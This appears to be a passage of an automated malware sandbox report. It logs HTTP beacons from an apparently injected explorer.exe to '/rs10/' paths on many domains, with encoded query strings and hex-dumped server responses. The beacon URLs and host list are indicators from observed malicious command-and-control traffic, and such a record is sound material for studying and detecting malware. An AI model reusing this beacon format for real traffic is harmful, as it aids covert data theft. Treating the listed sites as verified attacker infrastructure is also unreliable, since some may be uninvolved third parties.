                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ES6qWQ3CPXdPIdfdI9zYyCmb73rUtvrX%2F%2Fnyne9bZeX5Xn3hRgtL2LEh0mhaStAWviGkhpGZn44kD1Ih%2BhMvRsXuTZQsUxSwjiIjux%2FE3lyO1sDkR8wGr9QYNoB7ruoVn24%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 816f4731cb992f35-LAX
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 54 68 69 73 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 41 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 42 61 69 64 75 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 63 6f 6c 6f 72 3a 20 72 65 64 22 3e 0d 0a 20 20 20
                                                                                      Data Ascii: 4bf<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>404: This page could not be found</title> </head> <body> <script rel="nofollow" language="javascript" type="text/javascript" src="/Aquery.js"></script> <script rel="nofollow" language="javascript" type="text/javascript" src="/Baidu.js"></script> <div style="font-family: system-ui, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; height: 100vh; text-align: center; display: flex; flex-direction: column; align-items: center; justify-content: center"> <div> <h1 style="font-size: 24px; font-weight: 500; color: red">
                                                                                      Oct 16, 2023 11:29:34.123528004 CEST287INData Raw: 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 33 70 78 20 73 6f 6c 69 64 20 62 6c 75 65 22 3e 34 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65
                                                                                      Data Ascii: <span style="border-bottom: 3px solid blue">4</span> <span style="border-bottom: 3px solid blue">0</span> <span style="border-bottom: 3px solid blue">4</span> </h1> <div style="display: inline-blo
                                                                                      Oct 16, 2023 11:29:34.123585939 CEST287INData Raw: 32 0d 0a 0d 0a 0d 0a
                                                                                      Data Ascii: 2
                                                                                      Oct 16, 2023 11:29:34.123644114 CEST287INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.11.3050129103.224.212.21080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:29:52.922185898 CEST287OUTGET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1
                                                                                      Host: www.nightoracle.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:29:53.120343924 CEST288INHTTP/1.1 302 Found
                                                                                      date: Mon, 16 Oct 2023 09:29:53 GMT
                                                                                      server: Apache
                                                                                      set-cookie: __tad=1697448593.2485212; expires=Thu, 13-Oct-2033 09:29:53 GMT; Max-Age=315360000
                                                                                      location: http://ww38.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g
                                                                                      content-length: 2
                                                                                      content-type: text/html; charset=UTF-8
                                                                                      connection: close
                                                                                      Data Raw: 0a 0a
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.11.305013023.227.38.7480C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:30:34.341609955 CEST289OUTGET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1
                                                                                      Host: www.thesoftwarepractitioner.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:30:34.520132065 CEST290INHTTP/1.1 403 Forbidden
                                                                                      Date: Mon, 16 Oct 2023 09:30:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 4517
                                                                                      Connection: close
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Referrer-Policy: same-origin
                                                                                      Cache-Control: max-age=15
                                                                                      Expires: Mon, 16 Oct 2023 09:30:49 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EwDGESFM00gACgrIKYzV%2Bi6Ot6dcvfzCh4HacvjyBdTdtZN1kUc4p7nogLAy%2BThEuU9M%2FizgXBKpSmchVSmw%2BDiMQ8FveVHe9lz7cA%2F04pOsdC64Vx58BzrdnZXzGIYv4M52rNTkiGnp6rpjkBZFlLY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Server-Timing: cfRequestDuration;dur=11.000156
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 816f48ad2f172ac3-LAX
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62
                                                                                      Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="rob
                                                                                      Oct 16, 2023 11:30:34.520214081 CEST291INData Raw: 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69
                                                                                      Data Ascii: ots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-i
                                                                                      Oct 16, 2023 11:30:34.520272017 CEST293INData Raw: 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e
                                                                                      Data Ascii: hot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns
                                                                                      Oct 16, 2023 11:30:34.520325899 CEST294INData Raw: 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d
                                                                                      Data Ascii: der-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">816f48ad2f172ac3</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</
                                                                                      Oct 16, 2023 11:30:34.520369053 CEST294INData Raw: 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f
                                                                                      Data Ascii: rror-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.11.305013323.227.38.7480C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:31:15.754112005 CEST302OUTGET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1
                                                                                      Host: www.laserhairremovalkit.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:31:15.928987980 CEST304INHTTP/1.1 403 Forbidden
                                                                                      Date: Mon, 16 Oct 2023 09:31:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 4517
                                                                                      Connection: close
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Referrer-Policy: same-origin
                                                                                      Cache-Control: max-age=15
                                                                                      Expires: Mon, 16 Oct 2023 09:31:30 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MpGK7yZXHWUiYzLtGfchwAQaLzfuKq2WwxungnaqY4dClZ6lkG9HFkWgqR7PcaKKJRzGf8Y5%2BTSWuo90pIrRTe%2FUdCQXbWcMIyE%2FCa44ONOFBWnb3JDYxWv7HtMUKB7OG8CJp%2FRF3wt%2FVEsalg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Server-Timing: cfRequestDuration;dur=7.999897
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 816f49aff84a5220-LAX
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73
                                                                                      Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots
                                                                                      Oct 16, 2023 11:31:15.929069042 CEST305INData Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                      Data Ascii: " content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-c
                                                                                      Oct 16, 2023 11:31:15.929342031 CEST306INData Raw: 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20
                                                                                      Data Ascii: -full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two
                                                                                      Oct 16, 2023 11:31:15.929415941 CEST307INData Raw: 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65
                                                                                      Data Ascii: -0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">816f49aff84a5220</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</spa
                                                                                      Oct 16, 2023 11:31:15.929462910 CEST308INData Raw: 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d
                                                                                      Data Ascii: r-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.11.305013466.96.162.13380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:31:36.580336094 CEST308OUTGET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1
                                                                                      Host: www.omarshafie.online
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:31:36.878046989 CEST309INHTTP/1.1 302 Found
                                                                                      Date: Mon, 16 Oct 2023 09:31:36 GMT
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Content-Length: 316
                                                                                      Connection: close
                                                                                      Server: Apache/2
                                                                                      Location: https://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe
                                                                                      Cache-Control: max-age=3600
                                                                                      Expires: Mon, 16 Oct 2023 10:31:36 GMT
                                                                                      Age: 0
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6d 61 72 73 68 61 66 69 65 2e 6f 6e 6c 69 6e 65 2f 72 73 31 30 2f 3f 77 72 35 78 58 78 75 3d 75 56 6c 66 6d 6b 52 46 2b 69 56 77 2f 65 56 67 48 47 4a 41 50 59 54 48 77 4f 4b 2b 67 6a 61 35 6c 43 65 6e 59 32 36 4a 49 48 69 75 68 4a 74 41 57 4c 77 54 6f 57 56 75 46 4e 6a 66 51 4a 74 58 79 35 72 33 26 61 6d 70 3b 43 5a 46 3d 46 5a 34 50 33 5a 33 50 6b 66 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&amp;CZF=FZ4P3Z3Pkfe">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.11.3050135104.247.82.9080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:31:57.444381952 CEST310OUTGET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1
                                                                                      Host: www.electric-cars-19095.bond
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:31:57.686768055 CEST310INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Mon, 16 Oct 2023 09:31:57 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 146
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                      Oct 16, 2023 11:31:57.894397974 CEST311INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Mon, 16 Oct 2023 09:31:57 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 146
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.11.30501383.33.130.19080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 16, 2023 11:32:59.120800018 CEST328OUTGET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1
                                                                                      Host: www.latitudeinformatics.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 16, 2023 11:32:59.352847099 CEST328INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Mon, 16 Oct 2023 09:32:59 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 291
                                                                                      Connection: close
                                                                                      ETag: "65271109-123"
